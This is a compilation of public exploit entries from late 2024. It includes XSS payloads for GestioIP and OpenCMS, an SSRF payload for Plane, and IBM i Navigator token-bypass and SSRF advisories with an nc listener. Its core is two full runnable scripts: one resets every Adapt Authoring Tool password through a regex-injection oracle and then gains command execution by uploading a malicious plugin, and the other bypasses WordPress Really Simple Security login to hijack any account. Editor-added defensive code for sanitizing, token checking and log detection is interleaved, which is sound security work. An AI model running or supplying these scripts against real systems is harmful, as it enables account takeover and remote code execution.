The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.

### Prerequisites

To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions:

• Show backuped device configurations (read_device_config_perm)
• Upload device configurations (write_device_config_perm)
• Administrate CM (administrative_cm_perm)

1) vulnerable parameter: `host_id`

http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>'

2) vulnerable parameter: `stored_config`

http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'
-
OpenCMS 17.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: OpenCMS 17.0 - Stored Cross Site Scripting (XSS)
# Date: 24-11-2024
# Exploit Author: Siddhartha Naik
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=dade528f-ec17-11ee-ab97-7fde8b0295e1
# Affected Version: 17.0
# Category: WebApps
# Tested on: Windows 11
# CVE : CVE-2024-41447

1. Vendor Description:

OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.

2. Technical Description:

This is a Stored XSS vulnerability in the author field seen when publishing an article. This vulnerability has been tested on the latest versions of the Brave and Firefox browsers. It is believed to affect any user who clicks on the "Read More" button of the affected article and can be exploited by any user who is able to modify/create articles.

3. Proof Of Concept:

a) Start by creating a new article. In the author field write your script like so: <script>alert(1)</script>
b) Save and publish the article
c) The user who clicks on the read more button gets a popup saying '1'

4. Solution:

Upgrade to latest release.
http://www.opencms.org/en/home/news.html

5. Reference:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41447
https://github.com/Sidd545-cr/CVE/blob/main/CVE-2024-41447%20-%20Stored%20XSS%20in%20author%20field.pdf
http://alkacon.com
http://opencms.com
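The XSS posts on this page fall into two groups. Most (the Pimcore key value, the GestioIP `tsig_key` field and reflected CSV content, the GestioIP `host_id`/`stored_config` parameters, the OpenCMS author field) are plain text that was written into HTML without output encoding. The SilverStripe case is different: the oEmbed `html` field is *meant* to be markup, so encoding would break embeds and an allowlist sanitizer is needed instead. As an added example by the editor (not code from any of these projects), the block below shows both: `render_text_field` for the first group and a rebuild-from-scratch sanitizer for the second. The tag, attribute and frame-host allowlists are constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allowlists: which tags/attributes an oEmbed "html" fragment may keep
# and which hosts may be framed. Everything else, including every on* handler,
# <script>, <svg> and javascript: URLs, is dropped rather than escaped.
ALLOWED_TAGS = {
    "iframe": {"src", "width", "height", "title", "allowfullscreen"},
    "blockquote": set(), "p": set(), "br": set(), "a": {"href"},
}
ALLOWED_FRAME_HOSTS = {"www.youtube.com", "player.vimeo.com"}
VOID_TAGS = {"br"}


def render_text_field(value):
    """Output encoding for any stored free-text field (author, key value, TSIG
    key, echoed CSV content): the browser sees text, never markup."""
    return html.escape(value, quote=True)


def _url_allowed(attr, value):
    parts = urlsplit(value.strip())
    if parts.scheme != "https":          # also rules out javascript:, data:, vbscript:
        return False
    return attr != "src" or parts.hostname in ALLOWED_FRAME_HOSTS


class EmbedSanitizer(HTMLParser):
    """Rebuilds a fragment from scratch, emitting only allowlisted tags/attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.suppress = 0   # >0 while inside <script>/<style>: their text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.suppress += 1
            return
        if self.suppress or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                continue
            if name in ("src", "href") and (value is None or not _url_allowed(name, value)):
                continue
            kept.append(f" {name}" if value is None
                        else f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.suppress = max(0, self.suppress - 1)
            return
        if not self.suppress and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.suppress:
            self.out.append(html.escape(data, quote=False))


def sanitize_oembed_html(fragment):
    """Run on a provider's 'html' value before it replaces an embed shortcode."""
    parser = EmbedSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

The sanitizer never copies input through: every emitted tag and attribute is re-serialised from the parsed structure, so malformed markup that a regex filter would pass unchanged cannot survive. For production use a maintained library with the same rebuild-from-parse design is preferable to hand-rolled code, but the allowlist shape above is what any of them needs to be configured with.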
-
Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
```python
# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
# Date: 2024-11-24
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.adaptlearning.org/
# Software Link: https://github.com/adaptlearning/adapt_authoring
# Version: 0.11.3
# CVE Identifier: CVE-2024-50672 , CVE-2024-50671

import io
import sys
import json
import zipfile
import argparse
import requests
import textwrap


def get_session_cookie(username, password):
    data = {"email": username, "password": password}
    res = requests.post(f"{args.url}/api/login", data=data)
    if res.status_code == 200:
        print(f"[+] Login as {username}")
        return res.cookies.get_dict()
    return None


def get_users():
    session_cookie = get_session_cookie(args.username, args.password)
    if session_cookie is None:
        print("[-] Login failed")
        sys.exit()

    res = requests.get(f"{args.url}/api/user", cookies=session_cookie)
    users = [
        {"email": user["email"], "role": user["roles"][0]["name"]}
        for user in json.loads(res.text)
    ]
    roles = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3}
    users.sort(key=lambda user: roles[user["role"]])
    for user in users:
        print(f"[+] {user['email']} ({user['role']})")
    return users


def reset_password(users):
    # Overwrite potentially expired password reset tokens
    for user in users:
        data = {"email": user["email"]}
        requests.post(f"{args.url}/api/createtoken", data=data)
    print("[+] Generate password reset token for every user")

    valid_characters = "0123456789abcdef"
    next_tokens = ["^"]  # Ensure that only a single result is returned at a time
    while next_tokens:
        prev_tokens = next_tokens
        next_tokens = []
        for token in prev_tokens:
            for ch in valid_characters:
                data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"}
                res = requests.put(
                    f"{args.url}/api/userpasswordreset/w00tw00t",
                    json=data,
                )
                # Multiple results returned
                if res.status_code == 500:
                    next_tokens.append(token + ch)
    print("[+] Reset every password to HaXX0r3d!")


def create_plugin(plugin_name):
    manifest = {
        "name": plugin_name,
        "version": "1.0.0",
        "extension": "exploit",
        "main": "/js/main.js",
        "displayName": "exploit",
        "keywords": ["adapt-plugin", "adapt-extension"],
        "scripts": {"adaptpostcopy": "/scripts/postcopy.js"},
    }
    property = {
        "properties": {
            "pluginLocations": {
                "type": "object",
                "properties": {"course": {"type": "object"}},
            }
        }
    }
    payload = textwrap.dedent(
        f"""
        const {{ exec }} = require("child_process");

        module.exports = async function (fs, path, log, options, done) {{
            try {{
                exec("{args.command}");
            }} catch (err) {{
                log(err);
            }}
            done();
        }};
        """
    ).strip()

    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/bower.json",
            io.BytesIO(json.dumps(manifest).encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/properties.schema",
            io.BytesIO(json.dumps(property).encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/js/main.js", io.BytesIO("".encode()).getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/scripts/postcopy.js",
            io.BytesIO(payload.encode()).getvalue(),
        )
    plugin.seek(0)
    return plugin


def find_plugin(cookies, plugin_type, plugin_name):
    res = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies)
    for plugin in json.loads(res.text):
        if plugin["name"] == plugin_name:
            return plugin["_id"]
    return None


def create_course(cookies):
    data = {}
    res = requests.post(f"{args.url}/api/content/course", cookies=cookies, json=data)
    course_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": course_id}
    res = requests.post(
        f"{args.url}/api/content/contentobject",
        cookies=cookies,
        json=data,
    )
    content_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": content_id}
    res = requests.post(f"{args.url}/api/content/article", cookies=cookies, json=data)
    article_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": article_id}
    res = requests.post(f"{args.url}/api/content/block", cookies=cookies, json=data)
    block_id = json.loads(res.text)["_id"]

    component_id = find_plugin(cookies, "component", "adapt-contrib-text")
    data = {
        "_courseId": course_id,
        "_parentId": block_id,
        "_component": "text",
        "_componentType": component_id,
    }
    requests.post(f"{args.url}/api/content/component", cookies=cookies, json=data)
    return course_id


def rce(users):
    session_cookie = None
    for user in users:
        if user["role"] == "Super Admin":
            session_cookie = get_session_cookie(user["email"], "HaXX0r3d!")
            break
    if session_cookie is None:
        print("[-] Failed to login as Super Account")
        sys.exit()

    plugin_name = "adapt-contrib-xapi"
    print(f"[+] Create malicious plugin : {plugin_name}")
    plugin = create_plugin(plugin_name)

    print("[+] Scan installed plugins")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[+] {plugin_name} not found")
    else:
        print(f"[+] Found {plugin_name}")
        print(f"[+] Remove {plugin_name}")
        requests.delete(
            f"{args.url}/api/extensiontype/{plugin_id}",
            cookies=session_cookie,
        )

    print("[+] Upload plugin")
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(
        f"{args.url}/api/upload/contentplugin",
        cookies=session_cookie,
        files=files,
    )

    print("[+] Find uploaded plugin")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[-] {plugin_name} not found")
        sys.exit()
    print(f"[+] Plugin ID : {plugin_id}")

    print("[+] Add plugin to new courses")
    data = {"_isAddedByDefault": True}
    requests.put(
        f"{args.url}/api/extensiontype/{plugin_id}",
        cookies=session_cookie,
        json=data,
    )

    print("[+] Create a new course")
    course_id = create_course(session_cookie)

    print("[+] Build course")
    res = requests.get(
        f"{args.url}/api/output/adapt/preview/{course_id}",
        cookies=session_cookie,
    )
    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")

    print("[+] Remove course")
    requests.delete(
        f"{args.url}/api/content/course/{course_id}",
        cookies=session_cookie,
    )


def main():
    print("[*] Retrieve user information")
    users = get_users()
    print("\n[*] Reset password")
    reset_password(users)
    print("\n[*] Perform remote code execution")
    rce(users)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g. www.adaptlearning.org)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-U",
        dest="username",
        help="Username to authenticate as",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-P",
        dest="password",
        help="Password for the specified username",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()
    main()
```
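The `reset_password` stage of the script above depends on two server-side mistakes: the `token` field of the JSON body is passed straight into a document-store query, so an object like `{"$regex": "^a"}` turns an equality match into a pattern match, and the response status differs between "one match", "many matches" and "no match", which turns the endpoint into a character-by-character oracle. The block below is an added example by the editor (not Adapt's code) of a reset-token handler that removes both: the parameter is type-checked before any query is built, the lookup is an exact hash-keyed match, the token is single-use, and every failure returns the same response. The token length and hashing are assumptions for the example.

```python
import hashlib
import re
import secrets

# Assumed token format: 32 random bytes, hex encoded. The advisory only shows
# that tokens are hex strings; the length is constructed for the example.
_TOKEN_SHAPE = re.compile(r"[0-9a-f]{64}")


class InvalidToken(ValueError):
    pass


def issue_reset_token(store, email):
    """Create a token for email, remembering only its hash (keyed by the hash).
    A database leak then does not hand out usable tokens."""
    token = secrets.token_hex(32)
    store[hashlib.sha256(token.encode()).hexdigest()] = email
    return token


def coerce_token_param(raw):
    """The request parameter must be a plain string of the expected shape.

    A JSON body can carry any type: {"token": {"$regex": "^a"}} arrives as a
    dict, and handing it to a query builder turns the lookup into a pattern
    match. Checking the type and shape here closes that door before any query.
    """
    if not isinstance(raw, str):
        raise InvalidToken("token must be a string")
    if not _TOKEN_SHAPE.fullmatch(raw):
        raise InvalidToken("token has unexpected shape")
    return raw


def consume_reset_token(store, raw_token):
    """Exact-equality, single-use lookup. Every failure raises the same error
    so the response cannot act as an oracle for partially correct tokens."""
    token = coerce_token_param(raw_token)
    digest = hashlib.sha256(token.encode()).hexdigest()
    email = store.pop(digest, None)   # pop: a token can only ever be used once
    if email is None:
        raise InvalidToken("invalid or expired token")
    return email


def reset_password_handler(store, body):
    """Shape of the PUT handler: one uniform status for every rejected request,
    whatever the reason, and a 200 only after the token has been consumed."""
    try:
        email = consume_reset_token(store, body.get("token"))
    except InvalidToken:
        return 400, {"error": "invalid token"}
    return 200, {"reset_for": email}
```

Rate-limiting the endpoint and expiring tokens after a short window are the usual additions; neither is shown here because the two properties that defeat the enumeration are the type check and the uniform response.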
-
Really Simple Security 9.1.1.1 - Authentication Bypass
#!/usr/bin/env python3
# Exploit Title: Really Simple Security 9.1.1.1 - Authentication Bypass
# Date: 2024-11-19
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://really-simple-ssl.com/
# Software Link: https://really-simple-ssl.com/
# Version: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1
# Tested on: 'WordPress 6.7.0' in Docker container (vulnerable application), 'Ubuntu 24.04.1 LTS' with 'Python 3.12.3' (script execution)
# CVE: CVE-2024-10924
# Category: WebApps
# Repository: https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit
# Vulnerability discovered and reported by: István Márton

# This is a Python3 program that exploits Really Simple Security < 9.1.2 authentication bypass vulnerability.
# This makes it possible for unauthenticated attackers to log in as any existing user on the site,
# such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
# https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
# https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl

# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.

import argparse
import json
import logging
import random
import requests
import string
import validators

from requests.auth import HTTPBasicAuth

VERSION = "v1.0 (2024-11-19)"
DEFAULT_LOGGING_LEVEL = logging.INFO


def parse_arguments():
    parser = argparse.ArgumentParser(
        description=f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}"
    )
    parser.add_argument("-t", "--target", required=True, help="URL of the target WordPress")
    parser.add_argument("-uid", "--user-id", required=False, default=1, help="Victim user ID (1 is usually the admin).")
    parser.add_argument("-v", "--verbose", action="store_true", required=False, default=False, help="verbose mode")
    return parser.parse_args()


def validate_input(args):
    try:
        validators.url(args.target)
    except validators.ValidationFailure:
        raise ValueError("Invalid target URL!")
    try:
        if int(args.user_id) < 1:
            raise ValueError("Invalid user ID!")
    except ValueError:
        raise ValueError("Invalid user ID!")


def send_request(url, user_id):
    logging.info("Sending request to target WordPress.")
    target_endpoint = f"{url}"
    if not target_endpoint.endswith("/"):
        target_endpoint = f"{target_endpoint}/"
    target_endpoint = f"{target_endpoint}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
    }
    body = {
        "user_id": int(user_id),
        "login_nonce": "".join(random.choices(string.digits, k=10)),
        "redirect_to": "/wp-admin/"
    }
    logging.debug(f"Body: {body}")
    try:
        r = requests.post(target_endpoint, headers=headers, json=body, verify=False)
        logging.info(f"Request sent to target WordPress (HTTP {r.status_code}).")
    except Exception as e:
        logging.fatal("Error in contacting the target WordPress.")
        logging.fatal(e)
        return
    if r.status_code == 200 and r.headers["Set-Cookie"] is not None and "redirect_to" in r.text and "=deleted;" not in r.headers["Set-Cookie"]:
        logging.info(f"Cookie received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------")
    else:
        logging.fatal("Wrong response received from the target WordPress.")
        logging.debug(f"Cookie and body received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------\n{r.text}\n---------------------")


def main():
    args = parse_arguments()
    logging_level = DEFAULT_LOGGING_LEVEL
    if args.verbose:
        logging_level = logging.DEBUG
    logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")
    validate_input(args)
    target = args.target.strip()
    user_id = int(args.user_id)
    logging.info(f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}")
    logging.debug("Parameters:")
    logging.debug(f"  target = {target}")
    logging.debug(f"  user_id = {user_id}")
    send_request(target, user_id)
    logging.info("Finished.")


if __name__ == "__main__":
    main()
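From the defender's side, the request the script above sends has a fixed shape: a POST to the `skip_onboarding` REST route with a JSON body carrying `user_id` and `login_nonce`, so attempts stand out in web-server logs. The following is an added example, not part of the original exploit or of the plugin: it scans constructed access-log lines in the combined log format for that route, counts attempts and HTTP 200 responses per source address, and classifies a plugin version string against the 9.1.2 fix boundary stated above.

```python
import re
from collections import Counter

# Route the exploit above posts to, and the version bounds named in the advisory text.
VULN_ROUTE = "/reallysimplessl/v1/two_fa/skip_onboarding"
FIXED_VERSION = (9, 1, 2)
AFFECTED_FLOOR = (9, 0, 0)

# Combined log format: host ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_version(text):
    """'9.1.1.1' -> (9, 1, 1, 1); any non-numeric component is rejected."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in parts)


def is_affected_version(text):
    """True for 9.0.0 <= version < 9.1.2, the range the advisory names."""
    v = parse_version(text)
    return AFFECTED_FLOOR <= v < FIXED_VERSION


def is_bypass_attempt(line):
    """Return (ip, status) when a log line is a POST to the vulnerable route, else None.

    Both URL shapes are matched: the ?rest_route=... form used by the script
    above and the pretty-permalink /wp-json/... form.
    """
    m = LOG_RE.match(line)
    if not m or m.group("method") != "POST":
        return None
    if VULN_ROUTE not in m.group("path"):
        return None
    return m.group("ip"), int(m.group("status"))


def summarize(lines):
    """Count attempts per source IP, and separately those answered with HTTP 200
    (the status the exploit treats as success)."""
    hits = Counter()
    successes = Counter()
    for line in lines:
        found = is_bypass_attempt(line)
        if found is None:
            continue
        ip, status = found
        hits[ip] += 1
        if status == 200:
            successes[ip] += 1
    return {"attempts": dict(hits), "http_200": dict(successes)}


# Constructed sample log lines (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Nov/2024:10:00:01 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 143 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Nov/2024:10:00:02 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 143 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [19/Nov/2024:10:00:03 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 403 56 "-" "curl/8.0"',
    '192.0.2.4 - - [19/Nov/2024:10:00:04 +0000] "GET /wp-login.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [19/Nov/2024:10:00:05 +0000] "GET /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```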
-
Plane 0.23.1 - Server side request forgery (SSRF)
# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64

Description:
A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload that makes the server send HTTP requests to attacker-controlled domains.

Steps to Reproduce:
1- Go to the password recovery or login section where the email input is required.
2- Inject the following payload in the email field, replacing the domain with a server you control:

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

Send the request:

POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.
-
IBMi Navigator 7.5 - HTTP Security Token Bypass
# Author Title: John Page (aka hyp3rlinx)
# Author Website: hyp3rlinx.altervista.org
# Source: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com

[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i. IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application. This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.

[Vulnerability Type]
HTTP Security Token Bypass

[CVE Reference]
CVE-2024-51464

[Security Issue]
IBM i is vulnerable to bypassing Navigator for i interface restrictions. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to remotely perform operations that the user is not allowed to perform when using Navigator for i.

The web application generates an HTTP security token ID called "Mn:" with a 19 digit value, which is set in the HTTP session response header per user. Navigator uses this token for integrity purposes, to protect against arbitrary or malicious HTTP requests. Therefore, upon receipt of a bogus security token in an HTTP request, the server responds with an HTTP 403 Forbidden message. However, attackers can modify existing tokens to bypass the 403 Forbidden restriction and achieve their objectives.

The problem is that the Navigator security token logic does not properly create a token, nor detect whether a security token is valid or has been tampered with. Attackers can manipulate the last eight digits of a token by setting them all to 0 (zeroes) and/or incrementing them by one; the token length must stay the same. This tricks the application into processing attacker-controlled security tokens as if they were valid, which undermines the security of this protection.

E.g. Valid HTTP header generated by the server.

Mn: 6844795211344371559
Content-Length: 290
Origin: https://10.1.1.4:2003

Example of a bogus but honored MN header token set by an attacker, padded with zeros and happily accepted by the backend servlet.

Mn: 6844795211300000000

The MN token is generated in the "initProtectionSetting" java method.

public void initProtectionSetting(HttpServletRequest request, HttpServletResponse response) {
    initEncryption();
    initSession();
    [ REDACTED ]
    setMagicNumber(magicNumber);
    response.setHeader("MN", magicNumber + "");
    setUserAgent(request.getHeader("User-Agent"));
}

In the (doFilter) method we see the check for the MN header, which sends HTTP 403 on invalid tokens.

String mnStr = hRequest.getHeader("MN");
if (mnStr == null)
    mnStr = hRequest.getParameter("MN");
if (!isMnMatched(mnStr, hSession)) {
    NavLogger.severe("Forbidden. Incorrect HTTP ID");
    NavLogger.info("Request URI: " + requestURI);
    hResponse.sendError(403);
    return;
}

Invalid token response will return:

Error 403: SRVE38895F: Error reported: 403

If the attacker increments the MN token or pads it with zeros, the request is accepted and the token succeeds:

HTTP 200 OK

[References]
ADV0142855
https://www.ibm.com/support/pages/node/7179509

IBM classified this as "CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax". To be clear, HTTP headers are just the delivery method for sending attacker-controlled tokens to bypass the Navigator protection.

[Exploit/POC]
Intercept Navigator HTTP requests and increment the last one or two digits of the Mn: HTTP header security token, or just pad the last eight digits with all zeroes.

[Network Access]
Remote

[Severity]
Medium
CVSS Base score: 4.3

[Affected versions]
7.5.0, 7.4.0, 7.3.0

[Disclosure Timeline]
Vendor Notification: 10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
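A defender-side illustration of the check that was missing, as an added example that is not IBM's code: the token in the session must match the header exactly, in length and in every digit, compared in constant time, so neither tamper pattern from the advisory (zero-padded tail, incremented tail) passes. The `is_mn_matched` and `filter_request` names mirror the methods quoted above but the bodies are assumed; the 11-digit "prefix" used only to label a rejected token as probable tampering is derived from the advisory's 19-digit token with a manipulable 8-digit tail.

```python
import hmac
import logging
from dataclasses import dataclass

# Token layout from the advisory: 19 decimal digits, of which the trailing 8 are
# the ones the advisory shows being zeroed or incremented.
MN_TOKEN_LEN = 19
MN_SUSPECT_PREFIX_LEN = MN_TOKEN_LEN - 8

log = logging.getLogger("navigator-mn")


@dataclass(frozen=True)
class MnDecision:
    accepted: bool
    reason: str


def is_mn_matched(header_value, session_token):
    """Strict check: accept only a byte-for-byte match with the session token.

    Returns an MnDecision so the caller can log *why* a request was refused;
    the tail-modified case is the one worth alerting on.
    """
    if session_token is None or len(session_token) != MN_TOKEN_LEN or not session_token.isdigit():
        return MnDecision(False, "session has no well-formed token")
    if header_value is None:
        return MnDecision(False, "missing MN header")
    if len(header_value) != MN_TOKEN_LEN or not header_value.isdigit():
        return MnDecision(False, "malformed MN header")
    # Constant-time comparison over the whole value, never over a prefix.
    if hmac.compare_digest(header_value.encode(), session_token.encode()):
        return MnDecision(True, "ok")
    # Same length, same leading digits, different tail: exactly the tampering
    # pattern the advisory describes.
    if header_value[:MN_SUSPECT_PREFIX_LEN] == session_token[:MN_SUSPECT_PREFIX_LEN]:
        return MnDecision(False, "tail-modified token (probable tampering)")
    return MnDecision(False, "token mismatch")


def filter_request(headers, params, session_token, request_uri):
    """Mirror of the doFilter logic quoted in the advisory, using the strict check.

    headers/params are plain dicts (constructed for this example); returns the
    HTTP status the filter would produce.
    """
    mn = headers.get("MN")
    if mn is None:
        mn = params.get("MN")
    decision = is_mn_matched(mn, session_token)
    if not decision.accepted:
        log.error("Forbidden. Incorrect HTTP ID (%s) for %s", decision.reason, request_uri)
        return 403
    return 200
```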
-
IBMi Navigator 7.5 - Server Side Request Forgery (SSRF)
# Author Title: John Page (aka hyp3rlinx)
# Author Website: hyp3rlinx.altervista.org
# Source: https://hyp3rlinx.altervista.org/advisories/IBMi_Navigator_HTTP_Security_Token_Bypass-CVE-2024-51464.txt
# Vendor: www.ibm.com

[Vendor]
www.ibm.com

[Product]
Navigator for i is a Web console interface where you can perform the key tasks to administer your IBM i. IBM Navigator for i supports the vast majority of tasks that were available in the System i Navigator Windows client application. This Web application is part of the base IBM i operating system, and can be easily accessed from your web browser.

[Vulnerability Type]
Server Side Request Forgery (SSRF)

[CVE Reference]
CVE-2024-51463

[Security Issue]
IBM i is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks.

This is a post-authentication server-side request forgery that reaches non-managed nodes and external hosts on any TCP port. There are two call vectors that can be abused: one is "Test TLS connection", but it only allows connections to TCP port 9476. However, there is another servlet method called "testConnectPort" which an authenticated attacker can use to connect to any IP and port outside of the LAN. This can be abused for port scans, information disclosure, data exfiltration, bypassing firewall rules to attack non-managed nodes, or connecting to attacker-controlled C2 infrastructure.

This SSRF relies on exploiting the HTTP servlet security token bypass CVE-2024-51464, where the MN token of an intercepted HTTP request is incremented or padded with zeros. The attacker-controlled MN token is then seen as valid and the HTTP 403 Forbidden restriction is bypassed.

[Exploit/POC]
1) attacker payload

POST /Navigator/DispatcherServlet/serviceability/testPortConnection?system=10.1.1.4

{"hostname":"10.2.10.16", "port":445}

2) attacker's c2 server

┌──(rootggKali)-[/usr/share]
└─# nc -llvp 445
listening on [any] 445 ...
connect to [10.2.10.16] from victimhost [10.1.1.4] 44569

For a port scan we can infer whether external host ports are open or closed from the error responses.

Port is open:
Error 500: Connection reset

Port is closed:
Error 500: A remote host refused an attempted connect

[References]
ADV0142856
https://www.ibm.com/support/pages/node/7179509

[Affected versions]
7.5.0, 7.4.0, 7.3.0

[Network Access]
Remote

[Severity]
Medium
CVSS Base score: 5.4

Vendor Notification: 10/14/2024
Vendor fix and publication: 12/20/2024
12/27/2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution
ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management and control solution designed to allow users seamless access to their building data through standard building protocols including smart devices.

